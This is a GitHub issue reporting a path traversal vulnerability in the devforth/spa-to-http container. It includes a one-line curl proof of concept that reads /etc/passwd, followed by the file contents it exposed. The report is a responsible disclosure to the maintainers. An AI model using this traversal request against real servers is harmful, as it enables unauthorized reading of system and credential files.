Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Path Traversal Vulnerability in devforth/spa-to-http #14

Open
sunaley opened this issue Jun 21, 2024 · 0 comments
Open

Path Traversal Vulnerability in devforth/spa-to-http #14

sunaley opened this issue Jun 21, 2024 · 0 comments

Comments

@sunaley
Copy link

sunaley commented Jun 21, 2024

Description:

I have identified a path traversal vulnerability in the devforth/spa-to-http:latest Docker container. This vulnerability allows an attacker to access sensitive files on the container system.

Steps to Reproduce:

  1. Run the Docker container:
sudo docker run --rm -p 8888:8080 -d devforth/spa-to-http:latest
  1. Execute the following curl command:
curl --path-as-is http://127.0.0.1:8888/../../../etc/passwd

You will see the contents of the /etc/passwd file:

    root:x:0:0:root:/root:/bin/ash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/mail:/sbin/nologin
    news:x:9:13:news:/usr/lib/news:/sbin/nologin
    uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    man:x:13:15:man:/usr/man:/sbin/nologin
    postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
    cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
    ftp:x:21:21::/var/lib/ftp:/sbin/nologin
    sshd:x:22:22:sshd:/dev/null:/sbin/nologin
    at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
    squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
    xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
    games:x:35:35:games:/usr/games:/sbin/nologin
    cyrus:x:85:12::/usr/cyrus:/sbin/nologin
    vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
    ntp:x:123:123:NTP:/var/empty:/sbin/nologin
    smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
    guest:x:405:100:guest:/dev/null:/sbin/nologin
    nobody:x:65534:65534:nobody:/:/sbin/nologin

Expected Behavior:

The application should not allow access to files outside of the intended directory.

Actual Behavior:

The application allows traversal outside the intended directory, exposing sensitive files on the host system.

Environment:

Docker version: Docker version 24.0.7, build afdd53b
OS: Rocky Linux release 9.2 (Blue Onyx)

Additional Context:

Please address this vulnerability to prevent unauthorized access to sensitive files.

Thank you for your attention to this matter.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@sunaley